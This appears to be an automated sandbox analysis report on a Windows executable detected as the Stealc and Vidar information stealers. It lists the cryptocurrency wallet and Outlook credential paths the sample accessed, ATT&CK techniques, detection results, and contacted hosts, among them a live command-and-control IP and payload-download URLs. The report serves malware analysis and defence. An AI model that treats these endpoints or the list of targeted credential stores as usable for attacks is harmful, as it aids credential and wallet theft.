                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                      Source: Yara matchFile source: Process Memory Space: hwWxZRwpeL.exe PID: 3552, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Stealc
                      Source: Yara matchFile source: 0.2.hwWxZRwpeL.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hwWxZRwpeL.exe.2470e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hwWxZRwpeL.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.hwWxZRwpeL.exe.2550000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hwWxZRwpeL.exe.2470e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.hwWxZRwpeL.exe.2550000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2589210016.000000000078E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2044823834.0000000002550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hwWxZRwpeL.exe PID: 3552, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: Process Memory Space: hwWxZRwpeL.exe PID: 3552, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		14
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      Create Account                      		1
                      Extra Window Memory Injection                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol4
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder                      		111
                      Process Injection                      		3
                      Obfuscated Files or Information                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder                      		22
                      Software Packing                      		NTDS144
                      System Information Discovery                      		Distributed Component Object ModelInput Capture115
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Extra Window Memory Injection                      		Cached Domain Credentials31
                      Security Software Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSync1
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Virtualization/Sandbox Evasion                      		Proc Filesystem12
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                      Process Injection                      		/etc/passwd and /etc/shadow1
                      System Owner/User Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544133 Sample: hwWxZRwpeL.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 51 campuspersever.es 2->51 77 Suricata IDS alerts for network traffic 2->77 79 Found malware configuration 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 8 other signatures 2->83 8 hwWxZRwpeL.exe 37 2->8         started        13 msedge.exe 631 2->13         started        signatures3 process4 dnsIp5 59 campuspersever.es 87.106.236.48, 443, 49938 ONEANDONE-ASBrauerstrasse48DE Germany 8->59 61 77.83.175.105, 49706, 49733, 49796 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Ukraine 8->61 63 127.0.0.1 unknown unknown 8->63 43 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 8->43 dropped 45 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->45 dropped 47 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 8->47 dropped 49 10 other files (none is malicious) 8->49 dropped 85 Detected unpacking (changes PE section rights) 8->85 87 Detected unpacking (overwrites its own PE header) 8->87 89 Creates HTML files with .exe extension (expired dropper behavior) 8->89 91 8 other signatures 8->91 15 chrome.exe 8 8->15         started        18 msedge.exe 2 10 8->18         started        21 WerFault.exe 8->21         started        24 cmd.exe 8->24         started        26 msedge.exe 13->26         started        28 msedge.exe 13->28         started        30 msedge.exe 13->30         started        32 msedge.exe 13->32         started        file6 signatures7 process8 dnsIp9 65 192.168.2.5, 443, 49705, 49706 unknown unknown 15->65 67 239.255.255.250 unknown Reserved 15->67 34 chrome.exe 15->34         started        75 Monitors registry run keys for changes 18->75 37 msedge.exe 18->37         started        41 C:\ProgramData\Microsoft\...\Report.wer, Unicode 21->41 dropped 39 conhost.exe 24->39         started        69 ntp.msn.com 26->69 71 clients2.googleusercontent.com 26->71 73 21 other IPs or domains 26->73 file10 signatures11 process12 dnsIp13 53 apis.google.com 34->53 55 www.google.com 142.250.186.100, 443, 49710, 49713 GOOGLEUS United States 34->55 57 2 other IPs or domains 34->57

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      hwWxZRwpeL.exe42%ReversingLabs
                      hwWxZRwpeL.exe100%AviraHEUR/AGEN.1306978
                      hwWxZRwpeL.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\ProgramData\chrome.dll0%ReversingLabs
                      C:\ProgramData\freebl3.dll0%ReversingLabs
                      C:\ProgramData\mozglue.dll0%ReversingLabs
                      C:\ProgramData\msvcp140.dll0%ReversingLabs
                      C:\ProgramData\nss3.dll0%ReversingLabs
                      C:\ProgramData\softokn3.dll0%ReversingLabs
                      C:\ProgramData\vcruntime140.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      http://polymer.github.io/AUTHORS.txt0%URL Reputationsafe
                      https://ogs.google.com/widget/callout?eom=10%URL Reputationsafe
                      https://drive-daily-2.corp.google.com/0%URL Reputationsafe
                      http://polymer.github.io/PATENTS.txt0%URL Reputationsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://drive-daily-1.corp.google.com/0%URL Reputationsafe
                      https://drive-daily-5.corp.google.com/0%URL Reputationsafe
                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                      https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
                      https://chromewebstore.google.com/0%URL Reputationsafe
                      https://drive-preprod.corp.google.com/0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      chrome.cloudflare-dns.com
                      		162.159.61.3
                      		truefalse
                        		unknown
                        plus.l.google.com
                        		142.250.186.78
                        		truefalse
                          		unknown
                          play.google.com
                          		172.217.18.110
                          		truefalse
                            		unknown
                            ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                            		94.245.104.56
                            		truefalse
                              		unknown
                              sb.scorecardresearch.com
                              		18.239.83.91
                              		truefalse
                                		unknown
                                www.google.com
                                		142.250.186.100
                                		truefalse
                                  		unknown
                                  googlehosted.l.googleusercontent.com
                                  		142.250.184.193
                                  		truefalse
                                    		unknown
                                    campuspersever.es
                                    		87.106.236.48
                                    		truetrue
                                      		unknown
                                      clients2.googleusercontent.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        bzib.nelreports.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          assets.msn.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            c.msn.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              ntp.msn.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                apis.google.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  api.msn.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://sb.scorecardresearch.com/b?rn=1730149368269&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=31232435889767F20B43311389B266D3&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                      		unknown
                                                      https://deff.nelreports.net/api/report?cat=msnfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://77.83.175.105/4db719b1f2f948b0/softokn3.dlltrue
                                                        		unknown
                                                        https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1730149370792&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                          		unknown
                                                          https://campuspersever.es/chrome_93.exefalse
                                                            		unknown
                                                            http://77.83.175.105/4db719b1f2f948b0/nss3.dlltrue
                                                              		unknown
                                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1730149370164&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                		unknown
                                                                https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0false
                                                                  		unknown
                                                                  https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1730149370160&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                    		unknown
                                                                    https://c.msn.com/c.gif?rnd=1730149368269&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=490a2f67b40a434ab4bd51de99d9857b&activityId=490a2f67b40a434ab4bd51de99d9857b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0false
                                                                      		unknown

                                                                      URLs from Memory and Binaries

                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://duckduckgo.com/chrome_newtabhwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, Web Data.9.dr, AEBGIEGC.0.dr, CFCGIIEH.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://duckduckgo.com/ac/?q=hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2185983143.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, Web Data.9.dr, AEBGIEGC.0.dr, CFCGIIEH.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://77.83.175.105/4db719b1f2f948b0/freebl3.dllChwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://google-ohttp-relay-join.fastly-edge.com/3chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://77.83.175.105/4db719b1f2f948b0/freebl3.dllMhwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000007.00000003.2244301590.0000462800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2244428937.0000462800274000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://google-ohttp-relay-join.fastly-edge.com/1chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://77.83.175.105/4db719b1f2f948b0/sqlite3.dll3hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://i.ibb.co/31pRMq1/Firefox-Logo.pngECAFHDBGHJ.exe.0.drfalse
                                                                                    		unknown
                                                                                    https://ntp.msn.com/0000003.log9.9.drfalse
                                                                                      		unknown
                                                                                      https://google-ohttp-relay-join.fastly-edge.com/6chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://i.ibb.co/JKpFSmj/edge.pnghwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ECAFHDBGHJ.exe.0.drfalse
                                                                                          		unknown
                                                                                          http://anglebug.com/4633chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://anglebug.com/7382chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://google-ohttp-relay-join.fastly-edge.com/;chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://issuetracker.google.com/284462263msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/=chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/Gchrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://polymer.github.io/AUTHORS.txtchrome.exe, 00000002.00000003.2133633558.00002B4401264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133191790.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131752196.00002B4400F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133429420.00002B440041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133154762.00002B4400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131617079.00002B44010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131395309.00002B4400F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133219370.00002B4400FC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131870638.00002B44010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2131687525.00002B4401124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133101867.00002B4400CD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://docs.google.com/manifest.json0.9.drfalse
                                                                                                          		unknown
                                                                                                          https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/Jchrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://i.ibb.co/sWFTLkV/unknown-browser-icon.pngECAFHDBGHJ.exe.0.drfalse
                                                                                                                		unknown
                                                                                                                https://anglebug.com/7714chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://www.instagram.com7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drfalse
                                                                                                                    		unknown
                                                                                                                    http://77.83.175.10518a9a962225b1ffb.phpition:hwWxZRwpeL.exe, 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://77.83.175.105/4db719b1f2f948b0/mozglue.dllchwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://i.ibb.co/9NDBWJ6/microsoft.pngECAFHDBGHJ.exe.0.drfalse
                                                                                                                          		unknown
                                                                                                                          https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000002.00000003.2133633558.00002B4401264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133429420.00002B440041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://77.83.175.105/4db719b1f2f948b0/mozglue.dllihwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://anglebug.com/6248chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153564567.00002B4401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drfalse
                                                                                                                                  		unknown
                                                                                                                                  https://outlook.office.com/mail/compose?isExtension=true7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drfalse
                                                                                                                                    		unknown
                                                                                                                                    http://anglebug.com/6929chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://anglebug.com/5281chrome.exe, 00000002.00000003.2126732423.00002B44007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2126698844.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2125282560.00002B440037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2246011597.0000462800354000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000003.2245809560.0000462800368000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://i.y.qq.com/n2/m/index.html7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drfalse
                                                                                                                                          		unknown
